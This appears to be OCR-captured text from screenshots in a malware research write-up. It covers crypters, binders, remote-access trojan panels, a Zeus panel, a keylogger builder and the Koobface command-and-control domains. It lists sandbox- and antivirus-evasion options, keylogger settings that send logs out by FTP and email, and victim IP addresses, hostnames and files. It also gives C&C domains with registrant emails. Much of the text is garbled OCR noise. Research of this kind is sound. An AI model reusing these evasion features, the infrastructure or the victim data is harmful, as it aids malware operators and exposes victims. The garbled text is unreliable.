before default browser 


2 Rub3 Junior :.:.: Private ¥ersion 1.0 avaible on www.aspack?.com :.:.: 


<Your first exe file to protect and bind> 


<Your second exe file to protect and bind> 


Configuration for cryptage 


ork with vista 32bit: 
Crypt all (.res, .ico and .cll) 
Compress export edition 
Load ressource(s) 
Create backup <.rub3> copy 


WWW. aspack7.com 


Injection functions plugins 


V\ Inject Memory Loading 


Inject XOR Dil Cryptage 
Inject C+ Code Fusion 


Inject Rub3 Signature 
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Load exe in one proces 


Anti-Debugging 
Anti Virtual PC 
[J Anti ViWare 
Anti VirtualBox 
Try bypass SandBoxs 
methods: 
01 - Sariboxie 
02 - ThrestExpert 
03 - Anubis 
04 - CWSandbox 
05 - JoeBox 
06 - Norman Sandbox 
Create Server 
Use Thumbnail Plugin 
Pack with UPX 


© Creote server 


| Open | 


Open 


15 KB added! 


Create Package 
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S_ ttp:/{scanner.novirusthanks.orgjindex.php?session=44064456522066696937 1 19652125701783 ‘e 


a-squared Nothing found! 


Avira AntiVir Nothing found! 
Avast Nothing found! 
AVG Nothing found! 
BitDefender Nothing found! 
Clamav Nothing found! 
Comodo Nothing found! 
Dr.Web Nothing found! 
Ewido Nothing found! 


W32/DelfInject.A.gen!Eldorado (generic, not 
disinfectable) 


G DATA Nothing found! 
IkarusT3 Nothing found! 
Kaspersky Nothing found! 
McAfee Nothing found! 
NOD32 v3 Nothing found! 


F-PROT 6 


Norman Nothing found! 
Panda Nothing found! 
QuickHeal Nothing found! 
Solo Antivirus Nothing found! 
Sophos Nothing found! 
TrendMicro Nothing found! 
VBA32 Nothing found! 
VirusBuster Nothing found! 
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2 Us-Protect TMX Unique coded for konop71 


Open 


Compression Level 


[_}1 is [ ]9 Unit compress 0.9 


Cryptage Options 


US-Protect TMX [128 bits + 1] ~ ARRAARARRRARARE RRR ARERR RRR 


Us-Protect Options 


Compress resource(s) |_|Compress final package 
Crypt all ressource(s) [| Decompression Stream .clr 
Don't crypt/compress icon(s) (“| Runtime Unique Us-Protect 
Memory Injection 0000EESX1 

Anti: debugger, cracks, editors 


Unique version - TMX - Ho share and scan - by vmp Crypt and Protect 


Us-Protect TMX Unique 

Single Version - 100% Private and Single 
If you share and scan {online scanner), 
it's your problem... 


Thank 's 
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|) Chente - C:\Documents and Settings Adeninistratour | Beroau\HackStyle xc 


TesteRode | tuition Proprtétés | Contrdtes extormes Fichiers systénses | 


Pictre} - VE Pichia ox Height = 315 
IL) - MSCometL 2 lavage ist Tabindex = 48 
[Ly = MSCometLt noel tnd 
od» MSCombig CommorDvaiog Begin VB. label Lbitedos 
IMFILE - MSCorct¥.2 lmagelict BackColor = -214746364) 
roltpcen VB. Timer ForeColor = -2147483640 
Contnohador » VE. Timer Lett = 3640 
WLAV2- MSCometiLib Imagetiet Tep © 240 
ILSTATUS - MSCometb Imagelict Width © 33975 
ILTREE + NSCometl 2 lnaget st mo - a 
WOtatvs NS Comet Lintlier BoréerStyle = 1 
TV1 -MSComethb Tose Viewr aiieniin = 
StahssBarl « MSCometLd StohueB ar BeckStyle = 0 
LV MSCometiLs ListView igpeexence © 0 
WS - MS WintockLib Winsock End 
= | Btanage: - VB Fearse End 


& heenartager « MSComethl Lit 
AV Labell2 VB Label 


Begin WS.Freae Preae? 
Caption « “Archivos y Carpetas” 


= (B) trlo-Vi Fume heft = 120 
Ge bebo -MSCorct.d ListView Top = 1320 
4 [PF] Fesmnel2- VE. Frame q Vidth « 7380 
* | omtre -VB Frome Hesght = 5655 
bo] Tebindex + 35 
eater - VB Fase 
> — 1 Reke-ViFiace Begin MStonctitid. bistView ivPiles 
is En 
. bsenz =e Begin M&onccilib. ProgressBar ProgressBarl 
* -VOFe 
2 ennai _ End 
| Motes VB Frate tnd 
ry 
, = ep - VB Fieme Begin VD.frame tKeys 
Tal Chak - VB Frame Caption = “Contrasefias™ 
. Mes -'VB Frame Left « 3600 
. | Keye- VB.Frome Top + © 
* S| CMD - VB Frome Biden = 7530 
# S| tem -VB Frarce Meight = 7095 
TD er een VB Mere Visible + 0 ‘False 
"TB mace pen VB Merws TabInéex = 93 
re Th erg -VO Meru Begin BiCometilib.LiscView lvitii 
"TE earns thes - VE. Meru ae tnd 
* Fl bya nove Begin VD.Frame CCM 
Yiner2 -VB.1 Caption = “MS-DOS Remote” 
ral Left = 3600 
Tet! - VB TentBen Top « 6 
teage! «VE Menage Width + 7530 
@ Shape! - VE Shape Meight + 7095 
= Dine Visible + 0 ‘False 
6 te cco TabInéex = 69 
Bl ten tx E 232 Begin YB.CheckBox Check? 
eh ten tc 670 Caption + “Lispier resultados al cecsbic uo noevo.~ 
te ben bx BSOC bett = 120 
SynBinder V1.0 x 


2@ Build & Add Files File Extenssion (|) File Path “> Drop To 
A Fake pessoas exe [Appication] C:\Documents and Settings\Adminis... Not Choose 
y nalts J ipa [ipg image] C:\Documents and Settings‘\Adminis... Not Choose 
3 ac (iso [Iso File] C:\Documents and Settings‘\Adminis... Not Choose 
ra Hea pores vet ~ bat [Bat Script] C:\Documents and Settings\Adminis... Not Choose 

BM com [Dos Appicati.. C:\Documents and Settings\Adminis... ot Choose 
y< i ial [Dos 4 C:\D ds Ad Not Ch 


© Donate Projects 


Not Choose 
Not Choose 


JF swe [Flash] C:\Documents and Settings‘Adminis... 


[the PAY ATT 2 


> Build File 


Salngs Adminis 


© Add File 


| C:\Documents and Settings\Administrateur\Bureauil @ Remove File 


@ Clear List 


© Exit SynBinder 
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@) SynBinder V1.0 


File List 
(OFile Extenssion (File Path 
[] exe [Appication] 
ini [Ini File] 


“Drop To 
C:\Documents and Settings\Administrateur\Mes document... Not Choose 


C:\Documents and Settings\Administrateur\Mes document... Not Choose 


Not Choose 
C:\Documents and Settings‘Administrateur\Mes document... Not Choose 


E] ipa [ipa image] C:\Documents and Settings‘Administrateur\Mes document... 
| bmp [bmp image] 
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HipACryp - 0.0.1 


File Name: 


Leven Fie.) 


ST: 


www. cheesydoodle.com 
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_@ Files 
COOMA ALE 


[+] Graphics & Sounds 

9° Server Builders 

+) Extra 

{4 About & Contact 
© Help File Fi Lost Door ® 
{4 About 


R TunRat Supporte| 


@ Visit Official For 


Ww > 


> Private Edition cont © 2007-2009 > 


; 


O.System Wan \1P 


| §BENYAKOUB © ordinnet-... @ Kasper... AR Windows XP © 01:39:28 @) 41.221.18.1... GP 256M10 


Connection Status : R.Connected with 41.221.18.141 [OnLine Hosts : 1] 
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AbnLab-¥3 
AntiVir 
Authentium 
Avast 

AVG 
BitDefender 
CAT-QuickHeal 
ClamAV 

Drveb 

eSafe 


eTrust-Vet 


K7AntiVirus 


Kaspersky 
McAfee 


Microsoft 


Pande 
PCTools 
Prevxl 
Rising 


SecureVeb- 
Gateway 


Sophos 
Sunbelt 


2008.22.7.1 
7.9.0.26 
5.1.0.4 
4.8.1248.0 
8.0.0.16) 
7.2 

9.50 

0.94.1 
4.44.0.09170 
7.0.17.0 
31.6.6199 
4.0 
4.4.4. 56 
8.0.14332.0 
3.117.0.0 
i9 
73.1.1.45.0 
7.10.520 
7.0.0.125 
5428 


1.4104 


3597 
5.80.02 
9.0.0.4 
4.4.2.0 

v2 
21.02.62.00 


6.7.6 


4.35.0 
3.1.1785.2 

10 

6.3.1.1.146 
8.700.0,1004 
3.12.8.9 
2008.22.7.1457 
4.5.11.0 


2008.11.09 
2008.11.07 
2008.11.09 
2008.11.08 
2008.11.09 
2008.11.09 
2008.11.08 
2008.11.09 
2008.11.09 
2008.11.09 
2008.11.08 
2008.11.09 
2008.11.09 
2008.11.09 
2008.11.09 
2008.11.09 
2008.11.09 
2008.11.08 
2008.11.09 
2008.11.08 


2008.11.09 


2008.11.08 
2008.11.07 
2008.11.09 
2008.11.09 
2008.11.09 
2008.11.09 


2008.11.09 


2008.13.09 
2008.12.08 
2008.12.09 
2008.12.08 
2008.12.07 
2008.12.09 
2008.12.07 
2008.12.09 
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Vin32:Delf-LME 
BackDoor. Ircbot.Gco 


Worm. ¥in32. AutoRun. rye 
Win32:Delt-LME 
VirTool.¥in32.DelfInject. ac 


Worn. ¥in32. AutoRun. rye 


VirTool:¥in32/DelfInject. gen! 
AC 


Suspicious file 


Vorm. Vin32. PaBug. 
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AbnLab-¥3 
AntiVir 
Authentius 
Avast 

AVG 
BitDefender 
CAT-QuickHeal 
Clamav 
Drveb 
eSafe 
eTrust-Vet 


Rv7AntiVirus 
Kaspersky 
McAfee 


Microsoft 


NOD32 
Norman 
Panda 
PCTools 
Prevx. 
Rising 


SecureVeb- 
Gateway 


Sophos 
Sunbelt 
Symantec 
TheHacker 
TrendMicro 
VBA32 
VaRobot 
VirusBuster 


2008.11.7.1 
7.9.0.26 
5.1.0.4 
4.8.1248.0 
8.0.0.161 
7.2 

9.50 

0.94.1 
4.44.0.09170 
7.0.17.0 
31.6.6199 
4.0 
4.4.4.56 
8.0.14332.0 
3.117.0.0 
i9 
7T3.1.1.45.0 
7.10.520 
7.0.0.125 
5428 


1.4104 


3597 
5.80.02 
9.0.0.4 
4.4.2.0 

v2 
21.02.62.00 


6.7.6 


4.35.0 
3.1.1785.2 

10 

6.3.2.1.146 
8.700.0,1004 
3.12.8.9 
2008.22.7.1457 
4.5.11.0 


2008.11.09 
2008.11.07 
2008.11.09 
2008.11.08 
2008.11.09 
2008.11.09 
2008.11.08 
2008.11.09 
2008.11.09 
2008.11.09 
2008.11.06 
2008.11.09 
2008.11.09 
2008.11.09 
2008.11.09 
2008.11.09 
2008.11.09 
2008.11.08 
2008.11.09 
2008.11.08 


2008.11.09 


2008.11.08 
2008.11.07 
2008.11.09 
2008.11.09 
2008.11.09 
2008.11.09 


2008.11.09 


2008.13.09 
2008.11.08 
2008.12.09 
2008.11.08 
2008.11.07 
2008.32.09 
2008.32.07 
2008.12.09 
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Win32:Delt-LME 
BackDoor. Ircbot.Gc0 


Vorm. Win32. AutoRun. rye 
Win32: Delt-LME 
VirTool.Win32.DelfInject. ac 


Worn. Win32. AutoRun. rye 


VirTool:Win32/DelfInject. gen! 
ac 


Suspicious file 


Vorm. Vin32. PaBug. 


Con Type Computer « 
2485.1363 2496.126.3 MAXIM-SHAROV 


76.70.11418 192. 168.1.2 S-B390879CA7804 
58.107.20.7 58.107.207 CONCOMMi 

24.222 197.8 192. 168.1.103 STEVES-PC 

99. 253.234.1465 192.168.0103 : MADIME -DEA7SB 4E 
62 107.230.18 62. 107.230.18 BRUGER DACEBAS3 
213.22111.45 213.22111.45 EXPERIEN-280871 


3 


1800 MHz 
354 Miz 

2700 MHz 
2680 MHz 
2800 MHz 
2334 MHz 
1474MHz 
WOO MHz 
3401 MHz 
2594 MHz 
1833MHz 
3086 MHz 
2605 MHz 
340 MHz 

00 MHz 
2982 MHz 
TIOMHz 

$95 MHz 

1600 MHz 
2533 MHz 
3211 MHz 
2333 MHz 
3087 MHz 


76.64.65.140 192.168.2191 c MONSTER 
81.102. 114.243 81.002.114.243 HOME 
213. 163.118.41 192.168.1.100 s 


83.132 166.237 192. 168.14 : HOME 

TR ZMANANIE 192.168.1.65 " 22NOSTRE£88723 
69.194. 252 25 192.168.0102 ‘YOUR-4DACDOEA75 
87.11.97.165 192.168.1.103 NOME CCFIA888C8 
82 168.67.206 192.168.1.33 : MAX 
668.206.234.222 192. 168.15.107 : CARMICHEAL 
7943776 192.168.1.50 . ACER 

HAW A1B 192 168.22 

151.63.11.152 159.63.11.182 

58.68.12210 192.168.1.53 

72197.201.133 192. 168.1.102 s THOR-PC 
213.93.184.58 192.168.0.2 : Uw-485808528225 
‘A 200.868.138.221 10005 EQUIPO? 

Version 2.3.2 Nr. of Ports: 2 tN. of Plugins: 3 Nr. of Connections: 256 


SEECCEEEEECECECEEEEEESS 
rSSCCCCCOGOEGOGGOGOGOGGO © 1 


FEREREREREERRRREREEREEES 
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Legionario Cliente y2.0 Final 


ie) 255.255.255.25 a |) 


Pegar Informactes Limpar Tela 
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aw 


24202 


Sym BAT 1.8 [ Wtnate | 


¥ fetre Baloon Netfication 
Configure your own message balbon 


Scene One Is Connected To The Gert | 
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a. Zeus Control Panel 


Information 
Currerk version information 
Version: 1.0.2.1 
Build tine: 18:12:39 15.05.2007 GMT 
Package: |_logdec |_bullder r_desh r_socks r_cmds r_cmeds_eocee r_emds_hos 


t_k 1_ke_ss ¢_piefect r_rstiocoolies r_userlog r_ul_ pops r_ul_ ftp r_ul_pstore 
r_wininet 1_http_ keyboard r_hitp fakes r_hitp_detan 


Seryware status on thes system 


Internal-Minds Spyware met founded on this systees 
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(Mozilie/4.0 
(Mozilla/4.0 
(Mozille/s.0 
(Mozalia/$.0 
(Mozilie/$.0 
(Moz lie/$.0 
(Mozilie/$.0 
(Mozilie/$.0 
(Mozille/$.0 
zilla/$.0 
(Mozilie/$.0 
(Mozilie/$.0 
(Mozilie/$.0 
(Mozilie/$s.0 
(Mozilie/$.0 
iMozilie/$.0 
iMozilie/$.0 
iMozilie/$.0 
iMozilie/$.0 
Mozilie/$.0 
Moni lie/$.0 


(compatible: MSIZ &.0: Mingows BT $.i7 Trigent/4.07 GIBé: .MET CLR 2.0.807277 .BET 
(compatible: MSIZ &.07 Mingows BT $.i7 Trigent/4.07 GIBé: .MET CLR 2.0.807277 .RET 


(compatable Twittarle: +Rttpr//twitturls.com) IRttpr//twitturis.coa/ 
(compatable Twittarle: +httpr//twitturis.com) IMttpr//twitturis.cca/ 
(compatable: Twittarle: +httpr//twitturis.com) IRttpr//twitturis.cca/ 
(compatable? Twittarle: +Rttpr//twitturis.com) IRttpr//twitturis.cca/ 
(compatable; Twittarle: eRttpr//twitturis.com) IMttpr//twitturis.coa/ 
(compatable: Twittarle: +Rttpr//twitturis.com) IRttpr//twitturis.cca/ 
(compatable; Twitterle: +Rttpr//twitturls.com) IMttpr//twitturis.coa/ 
(compatable: Twitturle: ¢Rttpr//twitterls.com) IMttpi//twitturls.com/ 
(compatible: Twitturis: Rttp://twitturls.com) Ibttp://twitturis.com/ 
(compatible: Twitturle: https //twitturlis.com) Ibttp://twitturls.com/ 
(compatable Twitturle: ehttpr//twitturis.com) IRttp://twitturis.coa/ 
(compatable: Twitturie: tpi//twAtturis.com) IMttp://twitturis.coa/ 
(compatable: Twitturle: https //twitturls.com) IRttp://twitturis.com/ 
(compatable: Twitturls: *httpr//twitturis.com) IMttpr//twitturis.coa/ 
(compatable: Twitturle: ehttpr//twitturls.com) IRttpr//twitturis.com/ 
(compatable: Twitturle: tpi//twitturls.com) IBttpr//twitturis.cea/ 
(compatable Twitturle: *http://twitturls.com) IRttpr//twitturis.cea/ 
(compatable: Twitturle: ehttpr//twitturls.com) IMttpr//twitturis.cea/ 
(compatible: Twitturls: ehttp://twitturls.com) Imttpr//twitturis.cea/ 


+o. 


4$06.23827 .RET CLR 3.$.30729) (nttpi//te 
4806.23827 .RET CLA 3.5.30729) nttpi//tw 


+o. 


4(Mozille/4.0 (compatibles MSIE 7.07 Mindows NT $.i7 Trident/4.07 FunMebProdects: GTBé: Mozilie/4.0 (compatible: MSIE €.07 Mindows NT $.i7 SVi} 


Mozilie/$.0 
Mozilie/$.0 
(Mozalie/s$.0 
(Mozilie/$.o 
(Mozilie/$.0 
(Mozilie/$.0 


(compatable: Twitturls: ehttpr//twitturls.com) Ibttpr//twitturis.cea/ 
(compatable: Twitturls: *httpr//twitturls.com) IRttpr//twitturis.cea/ 
(compatable: Twitturis: tpi//twitturls.com) IRttpr//twitturis.coa/ 
(compatible: Twitturle: *httpr//twitturls.com) IRttpr//twitturis.coa/ 
(compatable: Twitturls: +http://twitturls.com) IRttpr//twitturls.cea/ 
(compatable: Twittarls: +httpr//twitturls.com) IRttp://twitturis.cea/ 


29iMozilie/4.0 (compatible: MSIE 7.07 Mindows BT €.0: GIBé: SVir SLOCi: .MET CLR 2.0.807277 Media Center PC §.07 .MET CLR 3.5.307297 .MET CLE 3. 


(Mozalia/s.0 
(Mozalia/s.0 
(Mozilla/s.0 
(Mozilia/s.0 
(Mozilia/s.0 
(Mozilia/s.0 


(compatable: Twittarls: +httpr//twitturls.com) IBttp://twitturis.cea/ 
(compatible: Twitturle: +http://twitturls.com) IBttp://twitturis.cea/ 
(compatable: Twitturle: +httpi//twitturls.com) IBttpr//twitturis.cea/ 
(compatable: Twitturls: ehttpi//twitturls.com) IBttpi//twitturls.cea/ 
(compatable: Twitturls: *http://twitturls.com) IRttpr//twitturls.cea/ 
(compatable: Twitturle: eBttp://twitturls.com) IRttpr//twitturls.cea/ 


SiMozille/S.0 (Kiir Or Linum 16867 en-GBs rvii.&.i.14) Geoko/20080827 Fedora/2.0.0.14-20080827.fo8.acer Firefou/2.0.0.i4(mttpi//twitter.com/ 


Mozilie/$.0 
Mozslie/s$.0 
(Mozilie/s.0 
zilia/$.0 
26) Mozilla/s.0 


(compatable: Twitturle: *Bttpi//twitturls.com) IRttp://twitturls.cea/ 
(compatable: Twitturle: +Bttpr//twitturls.com) IRttp://twitturis.cea/ 
(compatable: Twitturle: *Rttps//twitterls.com) IRttpi//twitturls.com/ 
(compatable: Twitturls: tpi// WwAtturls.com) IRttp://twitturis.com/ 
(compatible: Twitturle: ehttps//twitturls.com) IRttpi//twitturls.com/ 


i4(Mozilla/S.0 (Windows: Ur Bindows NT $.i7 en-GBr rvii.9.0.44) Geoko/2009060215 Firefou/3.0.14 GIBSinctps//twitter.com/ 
-@0(Mozille/S.0 (Macintosh: Us PRC Mac OS X 10.57 en-US: rvii.9.i) Geoko/20090624 Firefou/3.Sinctpi//twitter.com/ 
-87(Mozille/S.0 (Macintosh: Ur Intel Mac OS X: en) AgpleMebKit/420+ (FETML, like Geoko) Spaz/0.&.2 appi/index.Btml 


-26|Mozilia/$.0 
»26)Mozilia/s.0 


(compatable: Twitturle: https //twitturls.com) IMttpi//twitturls.com/ 
(compatable: Twitturle: ehttpi//twitturls.com) Ihttps//twitturls.com/ 


d)Mozilie/S.0 (Mingows: Ur Mingows BT $.i7 en-US: rvii.€.3.34) Geoko/20080404 Firefom/2.0.0.i4inttpi//tinyurl.com/litosy 


26) Mozalia/s.0 
26) Mozilia/s.0 


(compatible: Twitturle: «httpi//twitturls.com) IMttp://twitturls.com/ 
(compatible: Twitturle: *httpi//twitturls.com) IRttpi//tvitturls.com/ 


-ASO(Mozilla/S.0 (Macintosh: Us Intel Mac OS X 10.87 en-US: rvii.9.0.34) Geoko/20090€0214 Firefou/3.0.ii (httpi//twitter.com/ 
S.A73)Moziliea/$.0 (Windows: Ur Mingows BT $.i7 en-US: rvii.$.0.41) Geoko/2O0H0E0215 Firefom/3.0.iiimttpi//twitter.com/ 


}.103(Mozille/4.0 (compatible: MSIE & 


Windows MT $.i7 Tradent/4.07 GTBé: Mozille/4.0 (compatible: MSIE 6.07 Windows NT $.i7 SVi} : .MET CLA 2.0. 


lOSiMozille/4.0 (compatible: MSIZ 7.0: Mingows BT $.i7 Trident/4.07 FusMebProgects: InfoPath.i: MSH Optimized: US) (nttp://twitter.com/Beccaislikevac 


26(Mozilia/$.0 (Macintosh: Us Intel Mac 
S6)Mozilie/S.0 (Macintosh: U7 
6(Mozilla/$.0 (Macintosh: Ur Intel Mac 
36)Mozilie/S.0 (Macintosh: Us Intel Mac OS X 10. 


26) Mozalia/s.0 
26) Mozslia/s.0 
26) Mozalia/s.0 
iS9)Mozilie/4.0 
26) Mozalia/$.0 
10S /Mozilie/4.0 


OS X 10_$_77 ru-ru) AppleMebKit/$20.i¢ (FETML, like Gecko) 
OS X 10_$_77 ru-ru) Agple#enKit/ $30. (KETML, like Geoko) 
7% Ew-rw) Agple@ebKit/$30.i¢ (FETML, like Geoko} 
_$_72 Ew-re) Agple@ebKit/$30.i¢ (FETML, like Gecko} 
(compatable: Twitturls: +httpr//twitturis.com) IRttpr//twitturis.com/ 

(compatable: Twitturle: +httpr//twitturis.com) IRttpr//twitturis.com/ 

(compatable: Twitturle: +httpr//twitturis.com) IMttpr//twitturis.com/ 
(compatablesMSIE $.0i7 Windows -NT $.0 - real-url.org) iMttpr//real-url.org 
(compatable: Twitturls: +httpr//twitturis.com) IMttpr//twitturis.coa/ 

(oompatible: MSIZ 6.07 Mingows BT $.i7 SVir .MET CLR 4.3.43227 .MET CLR 2.0.807277 


Version/4.0.% Safari/S$20.i¢(nctpi//tenminatemeds 
Version/4.0.2 Safari/$30.i¢(nctpi//tenminatemeds 
Version/4.0.% Safari/$30.i¢(actpi//tenminatemeds 
Version/4.0.2 Safari/S$30.i¢(Rttpi//tenminetemedi 


-MET CLA 3.0.04806.307 .MET CLR 3.0.045906.6487 3 


Interestingly, | was able to take a peek at the statistics used exclusively for the Twitter 
campaign on two of the command and control/redirectors domains maintained by the gang. 
The results? Thankfully, pretty modest as you can see in the attached screenshots. 


What all of these URLs have in common are the [10]Koobface command and control/redirector 
(r-d-cgpay-090709 .com/go/tw.php) domains that they point to, including several new addi- 
tions prior to their original ones described in previous posts. 
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| j<Documents and Settings> 
| )<DOWNLOADS> 


©) Refresh 


8 Download 
8 Upload 


© Run File 
& Delete File 
— File Size 


© Downlaod Floder 


[236] 


EB Lost Door ® V3.1 [Special Edition] 
@ start Listening | '[$ Creat Server | GB Stoptistening [J Transparent [ 
: i Co 


\. Joussario = standard «= @ ESET NODS2... AP windows xP = 183829 127001 DB 256M0 


® About & Contact 


User : Administrateur 
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Connected Hosts :[1] 


24203 


24204 


Pc Informations 
OFILE=C: ‘Documents and Settings ‘4ll Users 


BM APPDATARC: ‘Documents and Settings Administrateur\Application Data 


A CLASSPATH=;; JCProgram Files\QuickTimeaTSystemiaT Java .zip 


@ CLIENTNAME=Console 

© commonProgramFiles=C: Program Files‘Fichiers communs 
es) COMPUTERNAME=STANDARD 

| ComSpec=C: WINDOW Sisystem32\cmd.exe 


SS FP_NO_HOST_CHECK=NO 

1S HOMEDRIVE=Cc: % Get Pc Info 

I HOMEPATH='Documents and SettingsVAdministrateur _ © Get Last Websites 

1B LOGONSERVER="ISTANDARD 

(Si NUMBER_OF_PROCESSORS=2 

(®\ oS=Windows_NT 

Bl Path=C: WINDOWS Isystem32; CMVINDOVYS; C:WYINDOW SS ystem32Vvbem;C: Program 
(Bl PATHEXT=.COM; EXE; BAT; CMD; \VBS;.VBE; JS; .JSE; WSF; .WSH 

SS PROCESSOR _ARCHITECTURE=x86 


Bl PROCESSOR _IDENTIFIER=x86 Family 15 Model 3 Stepping 3, Genuinelntel 
@lpracessnr | VFL =15 


4 | 


sm 
© Get Process 
csr ; 
_ | & kill Process 
win 


G2services.exe 

sob lsass.exe 
“Gesvchost.exe 
“G2svchost.exe 
svchost.exe 
“jesvchost.exe 
“Gesvchost.exe 

je spoolsv.exe 
“s2explorer.exe 

gb svchost.exe 
“enod32kui.exe 

<2 Armor2net.exe 
j2msnmsgr.exe 

<2 AppleMobileDeviceService exe 
j2mDNSResponder.exe 


g2nod32krn.exe 
« 
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Windows Manager 


> CiceroUlyndFrame 

4326808 Nessbeal - On aime ca - MiniLyrics 

4394650 SysFader 

= 460412 SysFader 

“66582 SysFader 

985814 Form4 
=) 1772850 Windows Manager 
= 4392084 Lost Door ® 'Y3.1 [Special Edition) 
=)527382 Form4 / Get Windows 

(986118 Form2 / Show Windows 
853194 Lost Door ) Hide Windows 
=132908 Snaglt 

9394820 Snagit Capture Preview 
=)131424 Event Viewer - Messenger Plus! 

4723968 IMON Hidden Vvindow 

4787346 Notification Yvindow 

9329058 Tunrat Sin Connected Hostes Information 


m 


windows are load 
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@) http: //61 MB. 230, /admin.php v > 


24205 


[241] 


[4] Trroy by Mikeh18 - Administrator 
Menu Commands Show and Hiding MSN Messenger About 


; Connected Victims: 


Show Information About Victim | 


‘Run a Ybs Script 


Msgbox "test" vbinformation,"test"" 


[242] 


3,¢WGA Uninstaller ( Xp , Sp1, Sp2 , Sp3) 


Uninstall 
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[244] 


24207 


Warning 


[245] 
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explorer.exe 


24209 


rbot [ester | 


Status : ‘Ping N? 
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a 
= Rub3 ¥4.0 Light - Private ¥ersion 


Basic Setting 


l 


Rubs ¥'4.0 - Private Yersion 
Updates avaible on www aspack?.com ---> private section 


Protect your tools 


[249] 
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24211 
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Microsoft* 


Windows 
.. Professional 


Type the characters you see in the picture below 


Sey 


we. 


Time before shutdown: 02:25 


Command and control domains sharing the same IPs - 98.143.159.138; 78.110.175.15; 


61.235.117.71; 119.110.107.137: 

upr0306 .com - Email: bigvillyxxx@gmail.com 
red-dir-cgpay-0307 .com 

cgpay-re-230609 .com 

r-d-cgpay-090709 .com 

rjulythree .com 

trisem .com - Email: 2009polevandrey@mail.ru 
uprtrishest .com - Email: 2009polevandrey@mail.ru 
uthreejuly .com 

rd040609-cgpay .net 

newcounters .cn - Email: madarkipun@yandex.ru 
rd040609-cgpay .net 

r2606 .com 

er20090515 .com 

redir2404 .com 

wn20090504 .com - Email: bigvillyxxx@gmail.com 
redir0705 .com 

redir0805 .com 

er20090515 .com 


<p [http:/ird040609-cgpayneticapfa=get&i=1 &v=7 ’ Go| 
C3 Bookmarks Google «| Cok «| Govak: «| Dictionary «| © Bookmarklets 


2abca79bb29f76c27a084 1 ebSdéd3céf| http. //nua06032009. biz/cap/temp/2abca7 9bb29f76c27a0S4 1 ebSdéd3c8f.jpg|Enter both words below, 


separated by 4 space.|([4-2A-Z0-O\$\.\.\V}+ )( 1+ la-ZA-Z0-O1SL.VI+) 


On the these very same [11]command and control domains, we can also also seen [12]Koob- 
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‘Email Adress _.__ Personel 


Message. 
Bulece Sats | Tek... 


*help eeeeemil 
c, 
‘one-h 2. Fatal-Error répo... 


cOded by who! 
buraya istediginizi yaziniz 


:D:D:D:D:D:D:D 
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W synspy 0.1 Private 

> Mise he fa Main Setting's 

= Connexion Setting's 
©) StartUp Setting's Log Setting's 
oY FTP Test Server Name : Server_O1 

S| Read Log's Logs Path : C:\Windows\System\SynLogs. Syn 
ves) Create Server 
@ About Log File When Size: 20 Kb 


—_—_—_— Recoard Setting's 
Recoarding Selected Options : 


[VidlFaKeys [ViPayNumKeys [ViSymbole Keys [VJExtra Keys 
[VIFx Keys | |Secondary Keys 


Encryption Setting's 
Password: 123456789 Om: 134q24ERe “ 


Retype: 123456789 


Test Text : Hello World f ) Tes 
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Main Settings Connexion Setting's 
> StartUp Setting's 
oP FIP Test 
>) Read Log's [VJUsing FTP (1) Methode — { Using Indy 10 Component } 
es) Create Server 


FTP Host; Ftp. SynSecurity, Net 


FTP Pass: 123456789 
FTP Port: 21 {Default ; 21 } 


Uploading Logs Name : 
‘ServerName _ 7 Logs. Syn 
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Main Setting's 
Connexion Setting's 
£9) StartUp Setting's 


og! FTP Test 
=) Read Lag's 


E-Mail Host : Your E-Mail Host 


3 ; From:  Fake@Fake.com 


To: DarkCoderSc@SynSecurity.Net 
Subject : Get Your Logs 


Message : 
You get the logs =) 


.!DarkCoderSc:, 
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WsynSpy 0.1 Private a 


(Gil Main Setting's Saas 
6 Connexion Setting's 


>) StartUp Setting's FTP Shell 
@ FTP Test 
Read Log's Starting ... 
) Create Server Conti prem 
© About : aie 
Configure Username ... 
Computer Info 
Configure Password... 
Configure Port ... 
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®w Read Log's } | C3] X_ 
Log's Setting's 
Load Crypted Log’ (Syn) : nS aR aap emRmescasie, 


Protect Password : 123456789 


Log's Core 
(Exécuter] 


Notepad 

[Sans titre - Bloc-notes] 

azertyuiopgsdfghjkimwxcvbn,  !0*“$eé'(-8_ cca =o #414 ([T4|[]| °° \@0123456789+-"} 
<up> <Down> <Right> <Left> <ESC> <Shift> <CAP> <TAB> 

Hello Word 


[Windows Live Messenger] 


DarkCoderSc@SynSecurity net 
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- General Settings {Options?| Registry 


Disable Xp firewall 
server vill not disable fireyall 


Offline keylogger 


/ Inject in Explorer 


“| Cancel Inject 
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ame in registrty 
"| ‘Winupdate 
Registry run 
AutoRun = Cancel AutoRun 


Server will not run in registry 


PathTo Run 


| System32 
Temp 

| Windows Dir 
/ Default 


24216 


‘Options | Registry | 


HostName: Default PC User | Default User 
Port: 2195 


127.0.0.1 


rest Ports | 


x) Message 


Run Time error ' Use 


tv cancel use 
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Host Name PC Name Wan \ IP 
EB administrateur standard 13:htaes so7 14, 256/Mo 
| # Connect 


|) Fes Manager 
| Screen Shot 
| Search Files 
| ad Remote Shell 


Create Server 
: Passwords 
R. Server Manag. ¢ 

Server Remover | PY 


& Extra 


| QPrinter 


@-§4 About & Contact | QHome Page 
| @ Disconnect 


Reverse Connected with 127.0.0.1 Connected Hosts :[ 1] 
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D Files Manager aa) 


& [My Disc] * & 

Files/Floder o 
Sy r 
cal <mmusic> 


[i SNIPER.mp3 
Lal: Face A Face.mp3 

Lal Umbrella ft. Jay-Z.mp3 

|.) (05) [David Vendetta] Bleeding Heart (Feat. Rachael Star).mp3 

LaF GabdFy™.._.-'""_28 06 2007@20_56 35. wav 

4) +31643607538. wav 

(a) +4851122251 4. way 

(4) O1 - Rick Sick - ElecttoPhone 2007. mp3 LI 
J O1- George Errassi - Hob Majnoun. mp3 
_a| O1- oussamio -Touch mp3 

fe OT _palfendot_- whete_are_you 2007_{club_ mo} mp3 

(4) O1-alex_gaudino-destination_calabria_{radio_edit). mp3 

|.) 01 -amo_and_navas_feat._anqui_-_light_my_eyes_[orginal_me}nbd mp3 

4) 01 -code_ted-kanikuly_2007, mp3 

Lj O1 -david_vendettatendez_vous. mp3 

(4) O1 -eric_prydz_vs._floyd-proper_education_[racio_edit] mp3 

4) 02 - Linkin Park - Breaking The Habit (Live) -.mp3 

| 02 - No Promises.mp3 


|) 119. Mi eccein Fieemi . Rahehel Ulahchteni mat 
« wr > 


- Downloading... 
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£ Rub3 ¥4.1 PR [Private] - www.aspack?.com 


ROBUST 


USEF U 


ASPACK’ SOrtTWARE 
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£ Rub3 ¥4.1 PR [Private] - www.aspack?7.com = 


e®nat=seeer 


